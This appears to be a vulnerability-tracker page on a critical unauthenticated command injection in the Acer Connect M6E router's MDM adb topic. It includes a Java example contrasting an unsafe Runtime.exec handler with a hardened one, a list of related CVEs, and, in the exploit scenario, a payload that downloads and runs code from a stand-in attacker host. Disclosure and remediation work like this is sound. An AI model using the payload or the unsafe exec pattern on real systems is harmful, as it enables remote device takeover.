
Acer Connect M6E · EUVD-2026-34199

CVE-2026-49185 · CRITICAL
OS Command Injection (CWE-78)
2026-06-04 · Acer · GHSA-78x5-76fx-mcp6
CVSS 4.0 score: 10.0 (NVD)

Severity by source

NVD PRIMARY
10.0 CRITICAL
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: X

Lifecycle Timeline

Jun 04, 2026 - 06:15 · Analysis Generated (vuln.today)
Jun 04, 2026 - 04:22 · CVSS changed (NVD): 10.0 (CRITICAL)
Jun 04, 2026 - 02:55 · CVE Published (nvd): UNKNOWN (no severity yet)

Description (CVE.org)

The FieldX MDM adb messaging topic passes unverified payloads directly into Runtime.exec(), allowing command/instruction injection.

Analysis (AI)

Unauthenticated remote command injection in Acer Connect M6E 5G Portable WiFi Router (firmware ≤ M6E_AI_1.00.000019) allows attackers to inject OS commands via the FieldX MDM adb messaging topic, which forwards unverified payloads to Runtime.exec(). The CVSS 4.0 score of 10.0 with network attack vector and no authentication required indicates a critical, trivially exploitable flaw; no public exploit identified at time of analysis but the simplicity of the bug pattern makes weaponization straightforward.
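
The bug class described above, as an added example that is not the router's firmware code or anything published by Acer or FieldX: a message handler that hands the payload to Runtime.exec(), next to a handler that maps the message onto a fixed argument vector. The class name, action names, binary paths and argument policy are all hypothetical.

```java
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.regex.Pattern;

public class AdbTopicHandler {
    // Hypothetical action names, each bound to a fixed binary chosen by the developer.
    private static final Map<String, String> ALLOWED = Map.of(
            "reboot", "/system/bin/reboot",
            "get-prop", "/system/bin/getprop");
    // Hypothetical policy: only get-prop accepts one argument, from a narrow character set.
    private static final Pattern SAFE_ARG = Pattern.compile("[A-Za-z0-9._-]{1,64}");

    // Pattern named in the description: the payload picks the program and its arguments.
    // exec(String) splits on whitespace and starts whatever the first token names.
    static Process handleUnsafe(String payload) throws IOException {
        return Runtime.getRuntime().exec(payload);
    }

    // Hardened: map the message to a fixed argv, or reject it.
    static List<String> buildArgv(String payload) {
        String[] parts = payload.split(" ", -1);
        String binary = ALLOWED.get(parts[0]);
        if (binary == null) throw new IllegalArgumentException("unknown action");
        List<String> argv = new ArrayList<>(List.of(binary));
        if (parts.length == 1) return argv;
        boolean argOk = parts.length == 2 && parts[0].equals("get-prop")
                && SAFE_ARG.matcher(parts[1]).matches();
        if (!argOk) throw new IllegalArgumentException("rejected argument");
        argv.add(parts[1]);
        return argv;
    }

    static Process handleSafe(String payload) throws IOException {
        // ProcessBuilder with a list runs the binary directly; no shell parses the input.
        return new ProcessBuilder(buildArgv(payload)).start();
    }

    public static void main(String[] args) {
        // Constructed sample messages; only the first is accepted.
        for (String p : new String[] {"get-prop ro.build.id", "get-prop x;id", "sh -c id"}) {
            try {
                System.out.println(p + " -> " + buildArgv(p));
            } catch (IllegalArgumentException e) {
                System.out.println(p + " -> rejected: " + e.getMessage());
            }
        }
    }
}
```

Constraining the exec sink addresses the injection only; the description also calls the payloads unverified, so the topic still needs publisher authentication before any message reaches a handler like this.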


Attack Chain (AI, derived)

Hypothetical attack flow derived from CVE metadata

Access: Reach router MDM message bus
Delivery: Publish crafted adb topic message
Exploit: Payload injected into Runtime.exec()
Execution: Shell metacharacters execute attacker commands
Persist: Gain root on router firmware
Impact: Pivot to connected LAN clients

Vulnerability Assessment (AI)

Exploitation: Network reachability to the router's FieldX MDM messaging endpoint (the adb topic) on an affected Acer Connect M6E running firmware ≤ M6E_AI_1.00.000019 - no authentication, no user interaction, and no special configuration are required per the CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N). …

Risk Assessment: Every signal points to maximum priority: CVSS 4.0 base score 10.0 with AV:N/AC:L/AT:N/PR:N/UI:N (network, low complexity, no auth, no user interaction) and full High impact across confidentiality, integrity, availability - plus subsequent-system (SC:H/SI:H/SA:H) impact indicating compromise can propagate beyond the router itself into connected client networks. …

Exploit Scenario: An attacker on the same network segment as the router - or reaching it over the internet if WAN-side management is exposed - publishes a crafted message to the FieldX MDM adb topic containing shell metacharacters such as `;wget http://attacker/x;sh x;`, which the receiver passes verbatim to Runtime.exec() and executes as the MDM daemon. The attacker gains a root-level shell on the router, can intercept or modify traffic for every connected client, and pivots from the portable hotspot into whichever corporate or personal LAN it bridges.

Remediation: Consult the Acer advisory at https://community.acer.com/en/kb/articles/19707 and upgrade the Connect M6E firmware to the version released after M6E_AI_1.00.000019. The input data does not name an exact fixed build (patch available per vendor advisory); verify the post-fix version string with Acer before deployment. …

Recommended Action (AI)

24 hours: Identify all Acer Connect M6E 5G routers in your environment and determine firmware versions (vulnerable if ≤ M6E_AI_1.00.000019); isolate or disconnect any affected units from production networks. …


CVE-2026-49190 CRITICAL
9.4 Jun 04

Command injection in the Acer Connect M6E 5G Portable WiFi Router allows authenticated remote attackers to install arbit

CVE-2026-49194 CRITICAL
9.4 Jun 04

Authentication bypass in the Acer Connect M6E 5G Portable WiFi Router allows low-privileged remote attackers to reach a

CVE-2026-49191 CRITICAL
9.3 Jun 04

Authentication bypass in the Acer Connect M6E 5G Portable WiFi Router's M3WebServer production build exposes hard-coded

CVE-2026-50214 CRITICAL
9.3 Jun 04

Authentication bypass in the Acer Connect M6E 5G Portable WiFi Router (firmware ≤ M6E_AI_1.00.000019) allows remote atta

CVE-2026-50209 CRITICAL
9.3 Jun 04

Privilege escalation via MDM endpoint hijack in the Acer Connect M6E 5G Portable WiFi Router (firmware ≤M6E_AI_1.00.0000

CVE-2026-50208 CRITICAL
9.2 Jun 04

Cryptographic weaknesses in the Acer Connect M6E 5G Portable WiFi Router (firmware versions through M6E_AI_1.00.000019)

CVE-2026-50205 HIGH
8.8 Jun 04

Sensitive information disclosure in the Acer Connect M6E 5G Portable WiFi Router exposes cleartext SMTP authentication p

CVE-2026-49202 HIGH
8.8 Jun 04

Unauthenticated exposure of internal multimedia session archives in the Acer Connect M6E 5G Portable WiFi Router lets re

CVE-2026-50211 HIGH
8.8 Jun 04

Exposed factory diagnostics in Acer Connect M6E 5G Portable WiFi Router (firmware M6E_AI_1.00.000019 and earlier) allow

CVE-2026-50225 HIGH
8.8 Jun 04

Database flooding via unauthenticated abuse of Acer Connect M6E 5G Portable WiFi Router's registration endpoint allows r

CVE-2026-49193 HIGH
8.7 Jun 04

Public exposure of telemetry data affects Acer Connect M6E 5G Portable WiFi Router, where misconfigured cloud storage co

CVE-2026-49187 HIGH
8.7 Jun 04

Information disclosure in the Acer Connect M6E 5G Portable WiFi Router (firmware versions up to and including M6E_AI_1.0
